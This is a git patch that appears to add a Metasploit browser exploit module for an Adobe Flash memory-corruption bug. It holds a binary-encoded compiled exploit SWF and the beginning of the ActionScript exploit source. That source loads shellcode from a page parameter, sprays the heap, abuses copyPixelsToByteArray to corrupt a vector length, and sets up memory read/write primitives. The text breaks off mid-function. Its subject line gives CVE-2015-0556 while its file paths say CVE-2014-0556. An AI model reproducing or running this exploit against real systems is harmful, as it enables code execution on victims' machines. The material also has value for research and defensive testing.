From 28fac60c81491b5de51a57a3e287a24896833004 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 15 Apr 2015 14:08:16 -0500 Subject: [PATCH] Add module for CVE-2015-0556 --- data/exploits/CVE-2014-0556/msf.swf | Bin 0 -> 17750 bytes .../source/exploits/CVE-2014-0556/Main.as | 182 ++++++++++++++++++ .../adobe_flash_copy_pixels_to_byte_array.rb | 110 +++++++++++ 3 files changed, 292 insertions(+) create mode 100755 data/exploits/CVE-2014-0556/msf.swf create mode 100755 external/source/exploits/CVE-2014-0556/Main.as create mode 100644 modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb 
diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf new file mode 100755 index 0000000000000000000000000000000000000000..24cfc1a53a7059bf76a4ac9d555d0657792e63a7 GIT binary patch literal 17750 zcmV(nK=Qv@S5q9RumAu>MF0R@001BW06YKujv4yj=Vl0?JwAo?b#KsqVKo~Xixy4a z1v37mOh!q!duw(1D_l1z3z0VgHxB9Y;ryOt+H4UaGwq-bc5tB0m@amJ@Zeci1_!QZnT84W^-kDu!b~qNjlRVSVp3_xhTH3JNC+2)1J*>=-p>|kv2*_BK)@TdzxW~s5 zRX~U5S-?);A+G44YL3M0*f=<)^i{biPBGOIR$lYO&{zPAusrYQ+MNi=aD#T4!$ zPkS*y6Mr~&jb2>K)qny&rD&(ESY3$E?lK{?1zUms&{I3Vb0Zn;&bkUFPb{mY4VQ_6c#HViESA>4F8`piFv1$5qE9_%@kpD0pq zctqX=oL;adkwZ831mGN0TXH{A1cGIYOdIz>U<}IL7S3L%_D3WwBhZ5M0FE;5n9ef^ zjgfh`5DZ7TaX6?`g>Srj{qDY(F|@YQ#ZO4~z$;xqm5{$6jS3`tlxS;HCD=?$0K`4t zq~7*|(Xdy69KIhl?6y;KtDM;s9LZbv_=!6cju`>>1>;v^7QL}O)Su@tnj zI})9Dl4YZue@J9CsF=t|7=(quRzJa))}1>2d`JNnpEGv_R%eM^SiZUU7XCHsavUIN zGs1Qz66+3Uf+3a+-5BS<60dYUM6( zYyX+GDG`Hj-i^w@`I1AeviRx}H+jCy9aowX-!`P!ORy15pBu!yM)4I>0i(TX-;Di- z%X(HO!{^OE@fCJZ7a$Wa!Xp+lVM1K=Ba{#wIBT>9e`}CeiX3mid(_!S>IxD_E zw=p9UWkW@Yg!r)kB%6U*vs9c?Gt4icnS_AAX-&-0NCt7PB-|S#uvkSuuDU`Gb>nSj ze_T{O2d~n~rqr%ug}MgR*XX|c)#>U;o7q#0eWX42fCK6p@ILZVdj7B1L&<^}KNuH3 zi-nBlBJA?xu`G+D8H(!t$ghtE$KYHbP?1_7iTosF{$9PF6gHgv(R>U(aBN(^v+%+< z6O4o*%cNrFwtJ-ogfWJ|2oQ)|K+{h^tcnE>ammS3+0{g1y0La61DdF_hpgX@JU5>G6&1eP{I5$bH-7D$98o3S86bYQfev@R^j<03gOyq0-5iE5T z4L~x$UN4Rm8u=ndk5iglf74zPvniT;f$(=^LwDdj8FT&#gM>MCWA&!`Le>?zNy$Kc zo3mGo1JK_J+>Vb4aSw)kv1cd1QGHtb#Z7NuiS5(Gc|Rfr;%nX}7)7l)!WbW#K_TpD zqyeA$)JcV0WWjPQ94vN8)ai8bN%hr-!JX8K%;zOK7m=~v*r_TTn}Hs+Pj zF-igk+=t?+Jc~L6L4@n$c1Qf%0Y=BsP(C6{RB(RUlIIYVqTy7UcPZ02`OJ>?CZ3{{ z!eh~O?2fFt7ZdS~aket>X0B;BYi~^0vs~4*d>A3<>M&m)xYV5#(Y=GV2_k!5P^C8AiW-Q%JooE;@}ci_W+Ja5+=;>_+$eFo() zYi0Kgyj=@o^uX%4GERq*6hHoP3vd@DdXvY`phFL-h?K~y^IB@NF22d46ck5>WNL8l zi`dIx&v>sG-{9r6eLS;a271K|sFSm-4!HhW|9n8TM!M7g}w)$F%Vqtb0Ik_^YaF|_a6_mU4bD>y18wC`TyVFjsl zopoa`0&r1jVC%5&WK?Lgjv3q75ee>EE>tJp;dtG~z~SB=gUxMm6aR{Dj0ZY22T zeAjAi$SN@tJ)pr!qYRw9m{j+5@8#9w$5;|YBy-R?@`HaZn_JR8@JVR=B1=ymYoUR1 
zZlfsUamY>mBzrw<#ZM43FJnkEJMaGZx_}AfY{j}3-fE(Y|Jl>Mh!}I8>_9P^PWMRP zW0P)Y`1z!4-&H`GD=j{J<(#X*2y;S+23IT(rHv)y?7Lptz;Z=09 z2Mn_WG>ywq?(8mB6N}t>$-79BqFgm18a8QDsD%pmkAS}^CdQ@pynA#i4&LAoeile| zP9uWBm#l*5eQ#l6qCMybssg^^hKssi%n0HurH|z#y*@t}aZA0}c8y)oou69${J3JB zKnr+zpy7#VRhpUSEQu-dD`)B5Tj=cVW=9c5-*4+WWLgVWwL-_)9P8)DEqlf!w$0Cq zDa&R)e5MFl3TlWBoz|~V(y{%Yx%p6~(US!PzDk9!>My>1Bn`x2#Q=mrKIm>k10TP`8}Z-Zp;?B`xlb_fs3Hg;~>G!S7> zleLu-Jlsn#1*DG;?a^x|j7rVP=mL*LWs;U@2fUK%TcMDgUs5VjXoD>?=Ky=8AuGdk z5Jb8&;zVTK5`!UXArygspI=%;i*m*$n0v8<+TJfDq&6D6Jc0We_+wh_Jf-`=CN5J} zU>co_)rUd1Zanqxn3&%M9XtxnQB#CK*UNvlxj_QQn#>v4@t|u8zE|1chs2L1JO*q# zUuE|W474P(7O6Q5lM2i#d~Jb4P?WSP{>16dq^&^Blnx^mJ<0vtmD&ZJ#oN$F4|yS0 z7Fn7)0>a>7jLe{$#uQ2z8jH*(i7Xde=Z2VHf{}d(WHRg}F$Ea0=k3FZI~5ZVXZROO z4>%&yOmY|$N0HaERl4|Kh}xjSgnh*K&QjeT(vCAW8Ux+lbe1!|dTRVf-fc%xfNTyE)hSkbdzQaD|`7?mnrwk@j3CGJBXOe7XmvFSG^;8B?Poh}s zUuD=~8&l?pW;u5Hc-l0HgCT;&M8~Q_@Axn$N8_ZX-Q0ZB|8C&Q` zGF}ylvBv_8sv7CPerZ!Cd@KLt_=t%2TvtsaL^HN7Ze$Y>sYPf8|3=gIIL5>IBFG7D ztv<&wZH%xyDzvN-hQ!6e5*0W#I0IASegb2NNz4D-Fo2*A4o&Os1=DDIX}v~dSXdoc zKV4FS8kUxz?4aX-JGc1{sEIweWtsQykANdf%m!!PMrR?&o2z|G<^syM24>Aa#mqz5 zHf?9e64e$ljplc4WY)%2TWpl(udNzl|Ml-Wf1$PWoTzDFH>oGKMxOcbMCys4kBQ<+_kIZU^!* zRQs57Usd}2rwR>n>ac!khnc)5Mj7Q%?U5yB6HhBXJ&X|yLPgKDCG4AJpV>&pDMPh$@Ae}dJ&8ssu_mM?U#}m4 zm3HT5b~$jp16-5kg6Co0Dz|$NDeT<{_x7cR`AyG4^%{Gj1X;+t%}N zg|^;AjV@iuw$2F8z@kPl+S;En-1YXk^@Ra&TlJ&dKuU0VRHS?A)5AhB`yejB^3^UH zF?-WF#>{}!r1acDwFo9zo~PuV09~#OGh{u~6jyYH*&EXP%zJ-_-B4Y#Vtnkt;F(M9{EvE)=thFZWx`YCuR(T8WtM*Q6fA*t% zMhyy(hRn!h> z9nf_k7CJ)M9r(_xqNsBkzG(@}@Co=M) zHB4V*pM0hYQ9f!V3-|yrZrd8+7!yl-l!_&JB3trt*I^WypjJ1BT^h@xv|PEW(9&a$ zFSGS4-QS))XUQ~Xz6il#rKAIpWv?}wr?(K*&&h)Ea4cJb4kZnb3`hako=$~T57%)v zqE5m#t|+3^Z0k}BIylJe4vs_QIpScQ7a>@>h#U(XMXqF2Dcf^1FS_46TgDD?|EE!y z-?}lxAPw{PI=jJoG+y;aiULO}uO(8M7b#K3b8|h|NHwQr6?qx5QXUWxoqF=Cj@{>E z8LcFirxOyWhBS<({VtXAJUklQ+c!)LPfvZL9m^#3$gX{}z#FOBRm$FgtV2x3wHvUB4X1WJ>JTuhA?4`hx0bSJxiWPSw1)m6FF%O5XZ z;9q%lm4~P)kym22R`U`U0D4B!H${#BEJER90fRz}IFHRN6EEul>9qa*VVy!EL4d@V 
zV#g`#%6qqz&J7Oap%p97sfTOJqYYe`_>f>m%36@?*meNWAAmF6K^1-?$r8 zM*lKCQ#y^0%sH5j?yHB{s5PHCIIBZPCn{S7du1p;J`Rd0w4-jV7Jt$&aujrU(Fj=$ zYBy5+W^#G!?phfEawg_5AisIMMBSGfl?m7Sx?t<~YWY1SQfF(BQB@2Sjp4lK<`eM( zBmP%!8v(F8(rVEDV}0HQ9h>t&eBG`2XP%UW#1Qj%e1mCRA}>7(hu#(UI(*HRr!=*^ zXRS-ghHSpl=%p^l#a}4KsQCvsvj;T!C6z-k7($><;?t;T5fk@SHCL0P^Si3QnuB89 zW9WZOEW3h{K_Ce<{#B^?cFLl4XSzlr!J9u4#~vR*n?c~1^5n7B`}H2x0__8L&Vh{R zS=Ly=&8;HRYiS$Y8QG09>*A(S#Pt^;%SHu~r#eE8Me3k&Z>ojrFKWPOdcQ=VD?Fd98_j#`Tq@;65cR1{a zPC_0(k><;quB}UeRxF@jp{qOrQS*aTg%&pVCGAmt;bvQwj@Cx6w$XIx4orCf*A*Q} z-qnz*=fqZOv;fS~MT246Bjx|3OK&Mz^_#k;*Q9-j@kdfuouJ&xY_rXB_}TaAywNms z)zBwy<{LCHmyF?n#l^Ch8)Wl7Q4$VJC!zLzo%4_0gUc6bLweJGxTb@lw9@;Mt=3lr z7d%b4p+CJ8?izCW#mR;Z^RJT?F~DhI$5;9@-4|?6Sy2ZF%z-jCf6m*KO^1{imH|{c zFIjcY?96zy3m?}nv-CyHQv*#9v)_NPm$0!&+2pkIz#U5^2@wf%p)?mF@vxb8%+^qV zg|ZwfSNx)i^Kp`spK#De3^*__C#3R!N=sUId#3O~n`%@MPL|n`%>ymnyZ1*uw$@?B z`22d-VpJgTKO-L)^%Mz0!03gm*`2sG<|qS}5??wTtv1m1mn>mgmZlPWrg27~8!;be z4#ETd#Rl6t&Q^t3QN|y)YMrSz@=3{@!{9L-9(F>dFjZ%Ki3s6vZRpk<0FiA{vap4q%n@ z)V0c^%r&_(9Pxof;3|RyI=o_a?K6f29Y8K45Y2q3w(iD81EFw_fwI~1wtHTb7=szz zm_$^;(coP22VT@wCZSrY`glKai26SBnBU9NYezY|V%038#?oe{k0Sm1EVnW-Cbxui z1_aq>lEn($!pg%Z`bS$4Jo&=H@DJu5N#M~qB`#v8DB)0_lJDxU;TauPyBQ-h*F9+G z_N2Xz>|J29#Ru_4A4GIIx*}VRg*-OK!-v%g?W@c01frjG_$VWOKg}hXNQ)LamM?42 zaYYP^O9iAr&xHTsLS!y~m~V2*!-C{#J8DV>mvNRpOU62B#P}jB_z6`HW|#CvOmA?;iR_Z|9P$@%&78Jmy#*F-tuQ+ zp(qOGBt%#tcqrIEe{=X{6ZN{wQCu(;?G1>MRI78H=?G>pS{4d-0v+$aN4i9ywscE6r=Q53c@)h%0R=}t_i zQH#h!1@`y0dr-3V1-{lsSit0qtqQcU%+o*Eh76mFvjD#vi3@tYAns~LDz|4RNJ%FA zvwxRCVtmG14HSJ=e-v2I3!7Y6Eb;_DBub=<7M)Mv7T6Dd33(FJ zE8lWy7Ik3T)jma@KbEqiwAaYfr6$DDO-}(z+B0xDZ^Kvhu4bdM*~VA_0lNc2R9IP; zO`-ytRCU{{SI;#>Z@a8*&pd(0^Ngg1<3D^)GaoXVaWrdv=M0OH5=W&m8LuB*N)@SMmbR$SK})gJACzB?nV-c%vNYP{nQQXqV5D)N6^jz&2P zye0|Q9;Un}wb6dpS*%CUZy-QO1oqomX~#BXMF6a;pYdK{AC*AhrLj$)4}v<55_Pe} zd+PZS0Qokuo#gRMG1@I6pVaqvT7=WOey5j+EKrpiTq%%G`4!`zuziSfj;FXofe1gK zQil__OTZ5qS;9pE*?B+PPuF+By7_q;R@zF9>&ku&RqWS4-Pr8Ba*qK=O1Vd=i)MFe 
z64zI_$%qU>3yTG16S?~`B~352uan+5KM)Shgp-!!JO)xRDY2`8ICCn+` zK^Mxe2sHsESHZtiZm@a#Q*|hRm2&%o5<=-KJ07J|gL$6yEc|vp7J&Wpr)Q zdEM@5P%dU1X+=V6KcjhBQ}rbP7a_L-AN+)w8{9A3iXLL5!2rS1PFC((Ca4|q@(H3F z|CvPN)r_4hI@u)Swi-4Gz;4B)?mV74P6cVFlp-Jo@Dt%qttop8XwCz}A;|$uHL>OW z9Aa3sJqN4LF6TQ-8os{P97s(&=h~WEWjI@tYIP*E?YgaW2_J>SHnkAK?3}t75!=Ai zjaO`Yi&0Tc8I2Q87${(UH+R#0}Wisk60@RJQ{x zYCo4O%GP2jb#RkG@=}e2LQXKK_#A5n&d_L5+0IP0Uao#0iBK}uXQj{}R{EtuU^(Ad zdaFw9?Lhkvy-Q&*mh0*ql^E3ECU2R0$XWTaLNlMtL@s+bxU`Q?RvC*#glzCTp1+yB z3Dz#oe5--zQx*~0_lGni8C(c!CGauggEEf?-)50b*eTbxpDz#xbjy^AZ-66gdh#vt zV|mc4I@@ROPkfzO!uSdjIS;pAg?*&CP z$rt}6G|x>k>LPu#BMPcZe2Me=$BRWz%3Dv%-E6!k6jMAi`PbEk`+skQn05x!dkpPF z>~Bmcl4u!Th7M}p}WN^ zwG-qKr$z!P`MI;p+i;K4A@5}fZQhI7k|szN#GhqEMb5tY23qV0-8hX?k#w9jvGKVa z>FNh&+{>S}SqKD6TEYvAz`Or!50QS@xcrNeMQSM31kCsw^C8RadOTObQaQAWOdT`h z6w0U4P&Kk%L3Y7=@>c5vo}O5nYy4dF^?ah=w>bYn$_`B_lq5)in_rbSdr7Y}@`O(| zF<-4m!Kw)+?u=qA_bqV_C<;tVDkutX&r1mWQoWhs9HXQ4cDpnIkymDnyJ6Gl%1*gT z=D@?sE|Jh?LO7~?n|B@wbkkZH#kbPadS<(!a7wdmd7p=k>;KM}PicAUCH9)t*>r9Q zH=xK_@=+XKiX_K$f3&c2OJ7Lu`~ECKETYqhZH$8g62J#Qw61!Lt*9sv1_`~rv`EuK zLlWlQkU8%%$<{fv0}mLnH`t_=m&asER1vZal@%-BJd4y!oDmA$J(ic17ll+o?+EWaZZyPVbLLodtp-O5 z1&EYPzxf@CT3g4pl}bT4Q8TOh4`M=^pEu|sc4YN#}NTeLha zWWDv{(_SadT0^}tYkh1A$jLdW!jf|XR{*ni;4ur!99x2k{6IbQ3s8`u%6K*|0N<=V zPB0&7X?B!iBtb!MA#!aju{3biL=^psm8Z;^$*gFrMep1_|{e z3zO@yw`DJ@8W0=U9E9ojQyVgwC;`lO3{d2b#B5dk==x616AygH2eczX$ICBY6j^b=#(=)abNqb|+|5zFSE2M~XR)IMY&zwO8)mja z5;0DV7a`4b zydiE5pfp03-5)&G7CT(;p*!?+iO|V&W%=JpIf+xTj?+eAkNYO74<9HYPKvV-&E>(W zajHLxhnN3uNCaY;Ie=C1w*=3#@L#b#k7V!t?pd=p@i8lWK+EAQ;km;n{Ccq>3o#h+ zwsMvmwPRlUIe6D!%9cq!AWc*xB50AyUC;Y|f(1;X%AEEU7WLa`y)*9nz|epz{Kedb z1Rj3BgE5>nE!x&Rl;Z(7>b~774dL9JCrFQmZZ{=5_Ln;&56+j@z?y#W4|RJKBNm|C zQuOc{-PvWWZH!O~W&XeDx2~6#)T(hjNH5%x6SIB|%6_?@YrhWc4lVa=id=0~yfNYF zo$YaUW0)I#J*k}7z?Lh>Mi@|XugNAGMSJJfn%zeShZZjo1=p1nmff8_;ji9fyEOWN zZnc+f>Toqk_3)V|Kev`Y0KSFlMlRG?SM@e2{A>((99mY(MzbF_h@@^$N+=8@=6wYC z{3tmU@q%krHqX1S5|Ue}GqcdKZdn_VGrK6(G*pqYSNr|yXElPb-JQPvcYpRwF9^Ml 
zfT{Q;^V;^7t{t=Dh@D7AaHdCn#_IBo>i2>9ue93lvBXDhYZ|;9h2`^u_69s%MIn#* z1~McOiD}(Z7-wJBLYLd8$jSheGJmLaFZO_@T-8s0ZiE%YdN+(`PQi{lA_*;&@-tS5 zTUyGIpt6j%U0Z0+R?-`G5~GWo@ryzq8YmWuxxwAVU<+d(@_$DP5tsDrTS7z{v6&YW zKBtkZYZdqoUQW{X!hb7tLHjGvdQuYuH%*nQ4XJS;UW(6{*c9jl!&viO!Yzm3G?-`n zs6KT6=jBPfSq@C;P5@V2IOq!mCvL_sS z))C6KkXoYv`nz}`A~F&^hMz$_4LCJCQskD%B1}Qg?a^7Z{Bl`DX@-_s6Vt>d2nBSj z4#DC!PnNk*bd12ut3Wc$$ag2dOVSEiR+Iu_>L%mVaY!-wE&~H9=Na{=XQA6XdKU=2 zB;PJc$!epEV2S$oEMS3-F}QR7QgEn#MV0KmF?QQ%XyrJAHrj|5PSEnRXsm zYjDlt?PJex@@s)FLh>Mx-F_f-s7d)soBg_#HHhVX*VYyVX*<>I!deTl4l?eVDj4S< z9<;H z>%AkUeKiaq-N4r&1qf+l#=G?ZbBH5Fx0k9q550!^CbAQgU7aN88Qe%C0RnbLjP@0} zTL#c1h4xq2aSc+sS1R>2so7G9u54Y|VJPBYr2BDu@hAwj4N#uP6eo)6{)A1Yy*cJvdqNQlb_mw`iPUw*uPd;) z4`ttgYZ9PMxCune62v-WLB5yh8jc;ezS}@*eiyeO2$2kE9#pUXqH-;F?JB+pZ!>n&}G0&E0B-u`@PgGKdA@+%od6cu2f4-hnW((tG?k~ z3IN6P`mw+h3LYtA&lN$7Q>)s`W95{=SdjTpxHe9im@!-*m^#RNO$7R-XkCWt$%Zh97i&FbPtOi?)?GO!W*CO+4>LV-TE~M&hh)4@ zNZnZKRpAcKAzVU@>T&FyUtx4f!nKKHJb!p{^&XdR;qH`uTIm9yR~p)?6!Ql0hZ*kN zbX{Mg|5)>ZNsK|B7YbJjXiqcbFmpSW?^L@q{R^%6oTzkd$jCh>Hld-CPx&jOioMHM zqDEF+8F_VFBeO!bb{f>|5=bb5-M<~hi0NV z52T%KCtq|_pn{}$ju;tFQFye+=i0PAo=EQo7@;rSI@XUFp2!-*yAGFCO`4IG(rO!w z-VIXwpfX9^;F!9oZN{GByY3MS6a9#qpUC0B$>ilZgbkd(VJlS$Y6_⪙T(%j&=0b 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/framework/libs) to the AIRSDK folder (/framework/libs) +// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) +// 4. Build with: mxmlc -o msf.swf Main.as + +// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/ +// Modified to be used from msf + +package +{ + import flash.display.Sprite + import flash.display.BitmapData + import flash.geom.Rectangle + import flash.utils.ByteArray + import flash.display.LoaderInfo + import mx.utils.Base64Decoder + + public class Main extends Sprite + { + private var bv:Vector. = new Vector.(12800) + private var uv:Vector. = new Vector.(12800) + private var bd:BitmapData = new BitmapData(128, 16) + private var i:uint = 0 + + public function Main() + { + var b64:Base64Decoder = new Base64Decoder() + b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var payload:String = b64.toByteArray().toString() + + for (i = 0; i < bv.length; i++) { + bv[i] = new ByteArray() + bv[i].length = 0x2000 + bv[i].position = 0xFFFFF000 + } + + for (i = 0; i < bv.length; i++) + if (i % 2 == 0) bv[i] = null + + for (i = 0; i < uv.length; i++) { + uv[i] = new Vector.(1022) + } + + bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401]) + + for (i = 0; ; i++) + if (uv[i].length == 0xffffffff) break + + for (var i2:uint = 1; i2 < uv.length; i2++) { + if (i == i2) continue + uv[i2] = new Vector.(1014) + uv[i2][0] = bv[6401] + uv[i2][1] = this + } + + uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000 + bv[6401].endian = "littleEndian" + bv[6401].length = 0x500000 + var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000 + var main:uint = uv[i][0xfffffc09] - 1 + var vtable:uint = 
vector_read(main)
+ vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8)
